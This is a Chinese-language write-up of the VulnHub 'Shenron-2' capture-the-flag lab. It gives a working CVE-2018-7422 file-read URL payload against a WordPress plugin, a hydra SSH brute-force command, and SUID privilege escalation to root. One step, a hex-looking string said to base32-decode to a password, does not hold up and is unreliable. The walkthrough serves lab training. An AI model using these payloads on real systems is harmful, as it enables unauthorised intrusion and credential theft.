下载地址
https://www.vulnhub.com/entry/shenron-2,677/
启动环境virtualbox,若启动报错更改虚拟机中usb配置为1.1即可
需要获得两个flag
信息收集
nmap扫描
nmap -sC -sV 192.168.210.220
发现22ssh,80和8080http
网站信息
80端口
暂未发现有效信息
8080端口
打开这个鬼样子,需要添加dns解析才可正常访问
去kali的hosts文件中添加一下域名解析
再访问就正常了
发现用wordpress5.7建站
漏洞查找
用wpscan进行扫描,直接跑跑不出来,需要带上api检测其插件
注册wpscan一个账号 https://wpvulndb.com/users/sign_up
wpscan --api-token=免费版的就行 --url=http://shenron:8080 --enumerate
这一次扫出不少
不一一列举了
其中有一个Site Editor编辑插件漏洞CVE-2018-7422易利用
CVE-2018-7422漏洞利用
searchsploit wordpress Site Editor
找一下漏洞库
发现存在利用方式
复制出来查看如何利用
http://shenron:8080/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
成功读取文件
发现两个用户jenny和shenron
ssh爆破
hydra -L user.txt -P wordlist.txt 192.168.210.220 ssh -V -f -t 4
发现账密jenny jenny
成功登入jenny
提权
查找一下suid权限
find / -perm -4000 2>/dev/null l
有一个execute这是一个二进制文件
逆向Execute
使用Ghidra工具进行逆向
工具下载地址:https://github.com/NationalSecurityAgency/ghidra
使用方法参考:https://www.wangan.com/docs/635
脚本执行流程为 1.将bash拷贝到/mnt下 2.赋予/mnt/bash 777的权限 3.吧文件所属者所属组都改为shenron用户 4.给/mnt/bash suid权限
综上可知 我们执行execute可以获取一个有shenron权限的/mnt/bash
执行/usr/bin/Execute发现成功生成bash
./bash -p 拿到shenron权限
在shenron家目录中发现flag1和一串密文
40252f8ffc3932fd2b5ae4995defb92
base32解码 得到shenron账户密码为 ShEnRoNShEnRoNShEnRoNShEnRoNShEnRoN@ShEnRoN#ShEnRoNPaSsWoRd
切换到shenron,发现可以用sudo执行任何身份的命令
sudo su root 切换到root,在root家目录中发现flag2.通关!